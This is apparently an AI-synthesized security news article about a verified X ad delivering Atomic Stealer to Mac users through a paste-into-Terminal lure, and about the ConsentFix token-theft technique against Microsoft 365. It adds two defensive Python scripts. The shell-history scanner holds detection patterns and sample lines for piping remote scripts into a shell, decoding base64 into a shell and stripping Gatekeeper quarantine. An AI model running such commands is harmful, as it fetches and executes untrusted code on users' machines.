VYPR research
Published Jul 3, 2026 · 1 source

Verified X Ad Spreads Mac Malware; ConsentFix Targets Microsoft Accounts

Cybercriminals are employing sophisticated social engineering tactics, using a verified X ad to distribute Mac malware and a new technique called ConsentFix to hijack Microsoft 365 accounts.

A recent campaign leveraged a sponsored advertisement on the social media platform X, formerly Twitter, to distribute malware targeting macOS users. The malicious ad was posted from a verified account, which lent the scam an air of legitimacy. The attack used a ClickFix-style social engineering lure: a fake download page for "DynamicLake," a legitimate macOS utility that turns the MacBook's display notch into a functional equivalent of Apple's Dynamic Island. The campaign's success relied on tricking users into opening Terminal and pasting commands that, unbeknownst to them, silently installed malware.

This attack combines several worrying trends in cybercrime. First, it relies on ClickFix-style social engineering, in which the victim, not an exploit, executes the malicious commands. Second, it uses lookalike domains that closely mimic the sites of trusted Mac applications, further deceiving potential victims. Third, the abuse of paid advertising infrastructure, including verified accounts, lets attackers scale their operations and reach a broader audience. The malware delivered in this campaign is reported to be variants of the Atomic Stealer (AMOS) infostealer, built to exfiltrate credentials, browser data and other sensitive information from compromised systems.
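ClickFix lures succeed because the victim types or pastes the command themselves, so nothing suspicious is downloaded until the shell runs it. A practical detective control is to scan shell history and clipboard or terminal-paste telemetry for the command shapes these lures rely on. The scanner below is an added example and is not code from the page or from the researchers who reported the campaign. The sample history lines are constructed, and the heuristics (pipe a remote script straight into a shell, decode base64 into a shell, strip the Gatekeeper quarantine attribute, run AppleScript from the shell, suppress history) are generic ClickFix indicators; the page does not disclose the exact commands the DynamicLake lure used, and this code does not claim to reproduce them.

```python
import re
from dataclasses import dataclass

# Generic ClickFix / "paste this into Terminal" indicators for macOS.
# Assumption: these patterns reflect the technique as commonly observed;
# the DynamicLake campaign's actual commands are not on the source page.
INDICATORS = [
    # curl/wget output piped straight into a shell, e.g. `curl -fsSL URL | bash`
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|;&\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # `sh -c "$(curl ...)"` style command substitution of a remote fetch
    ("subst-fetch", re.compile(r"\$\(\s*(curl|wget)\b")),
    # base64 blob decoded and fed to a shell (macOS base64 accepts -d, -D, --decode)
    ("base64-decode-exec", re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Removing com.apple.quarantine defeats Gatekeeper's "downloaded from the internet" check
    ("quarantine-strip", re.compile(r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine")),
    # Inline AppleScript from the shell (common for password prompts and persistence)
    ("osascript-inline", re.compile(r"\bosascript\s+-e\b")),
    # Attempts to hide the command from history
    ("history-suppress", re.compile(r"\bhistory\s+-c\b|\bHISTFILE=")),
]

# zsh extended history lines look like ": 1719990000:0;<command>"
_ZSH_EXT_PREFIX = re.compile(r"^:\s*\d+:\d+;")


@dataclass
class Finding:
    line_no: int
    rule: str
    text: str


def normalize(line: str) -> str:
    """Strip the zsh extended-history prefix so only the command is matched."""
    return _ZSH_EXT_PREFIX.sub("", line).strip()


def scan_commands(lines):
    """Return a Finding for every (line, rule) pair that matches an indicator."""
    findings = []
    for i, raw in enumerate(lines, 1):
        cmd = normalize(raw)
        for name, pat in INDICATORS:
            if pat.search(cmd):
                findings.append(Finding(i, name, cmd))
    return findings


# Constructed sample ~/.zsh_history content (not real campaign data).
SAMPLE_HISTORY = [
    ": 1719990000:0;ls -la ~/Downloads",
    ": 1719990010:0;curl -fsSL https://example.invalid/install.sh | bash",
    ': 1719990020:0;echo "aGVsbG8=" | base64 -d | sh',
    ": 1719990030:0;xattr -d com.apple.quarantine ~/Downloads/App.dmg",
    ": 1719990040:0;brew update",
]


if __name__ == "__main__":
    for f in scan_commands(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.rule}: {f.text}")
```

Treat hits as triage signals rather than verdicts: developers legitimately pipe installers into a shell and strip quarantine attributes, so the value lies in correlating a hit with a fresh browser visit to a lookalike domain or with a paste event, not in blocking the command outright.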

The methodology echoes previous incidents in which attackers used platforms like Google Ads to promote fake software installers, often targeting users searching for legitimate developer tools. The lesson is that verification badges and paid advertising placements are not reliable indicators of safety: attackers design campaigns specifically to pass the platforms' automated screening. The researchers who identified this campaign reported the malicious advertisement to X and contacted the account owner, and the ad has since been removed from the platform.

In parallel, a separate technique known as ConsentFix is targeting Microsoft 365 accounts without installing any malware. It socially engineers users into handing over the token material that a browser sign-in callback returns. Instead of asking for passwords or multi-factor authentication (MFA) codes, ConsentFix manipulates users into performing an action that delivers session tokens to the attacker, who can then take over the account.

The ConsentFix attack chain begins with a seemingly innocuous action, such as dragging a link into a browser, and within moments the attacker holds the tokens needed to take over a Microsoft 365 account, sidestepping the controls that normally stop credential phishing. A typical phishing email contains a link hosted on a trusted platform such as Dropbox, sometimes protected by a password so that security tools cannot inspect the destination. Upon clicking the link, the victim is presented with a page resembling a legitimate Microsoft sign-in portal.

The critical step is an instruction to drag a localhost callback link into the browser. A callback to localhost never leaves the victim's machine on its own; it is the user's drag-and-drop, performed without understanding what the link carries, that transfers the session tokens to the attacker. Those tokens grant access to email and other Microsoft 365 applications without the attacker ever needing the password or an MFA code. The technique has reportedly been shared on cybercrime forums, putting it within reach of less experienced threat actors looking to steal Microsoft 365 accounts.
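The defensive question for a SOC is what a "localhost callback link" that a user was told to drag actually contains, and how to log it without copying the secret into the ticket. The classifier below is an added example, not code from the page or from the researchers who described ConsentFix. It treats any URL whose host is a loopback address and whose query or fragment carries standard OAuth/OIDC credential parameters as a callback worth escalating, and redacts those parameters for safe logging. The parameter names (`code`, `access_token`, `id_token`, `refresh_token`, `token`) are the standard OAuth 2.0 and OpenID Connect ones and are an assumption; the page does not say which parameter ConsentFix relays. The sample URLs are constructed.

```python
import ipaddress
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Assumption: standard OAuth 2.0 / OIDC parameter names that carry credential
# material on a redirect; the source page does not name the parameter ConsentFix uses.
CREDENTIAL_PARAMS = {"code", "access_token", "id_token", "refresh_token", "token"}


def is_loopback_host(host):
    """True for localhost, *.localhost, 127.0.0.0/8 and ::1."""
    if not host:
        return False
    host = host.lower()
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def _pairs(component):
    # Tokens may ride in the query (auth-code flow) or the fragment (implicit flow).
    return parse_qsl(component, keep_blank_values=True)


def classify_callback(url):
    """Describe whether a URL looks like a loopback callback carrying credentials."""
    parts = urlsplit(url)
    found = sorted({k for k, _ in _pairs(parts.query) + _pairs(parts.fragment)
                    if k.lower() in CREDENTIAL_PARAMS})
    loopback = is_loopback_host(parts.hostname)
    if loopback and found:
        verdict = "loopback-callback-with-credentials"
    elif found:
        verdict = "callback-with-credentials"
    else:
        verdict = "no-credential-material"
    return {"loopback": loopback, "credential_params": found, "verdict": verdict}


def redact_callback(url):
    """Return the URL with credential parameter values replaced, safe to paste into a ticket."""
    parts = urlsplit(url)

    def scrub(component):
        pairs = [(k, "REDACTED" if k.lower() in CREDENTIAL_PARAMS else v)
                 for k, v in _pairs(component)]
        return urlencode(pairs)

    return urlunsplit((parts.scheme, parts.netloc, parts.path,
                       scrub(parts.query), scrub(parts.fragment)))


# Constructed sample URLs (no real tokens).
SAMPLE_URLS = [
    "http://localhost:5000/callback?code=0.AXoAconstructedcode&state=xyz",
    "http://127.0.0.1/#access_token=constructedtoken&token_type=Bearer",
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=abc",
]


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(classify_callback(u)["verdict"], redact_callback(u))
```

Loopback redirect URIs are legitimate for native and command-line clients, so the URL alone is not malicious. The escalation signal is the combination: a web page that asked the user to drag or paste such a link somewhere else, which is exactly the step in which the token leaves the machine.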

To stay protected against these threats, users should treat unexpected links with caution regardless of their source, including verified accounts and sponsored search results. Think critically before following unusual instructions, never paste commands from a web page into Terminal, never drag or copy a sign-in link into another site, and always verify the browser's address bar before entering credentials. Up-to-date anti-malware software with real-time web protection, such as the Malwarebytes Browser Guard extension, adds a further layer of defense against malicious websites and social engineering lures.

Synthesized by Vypr AI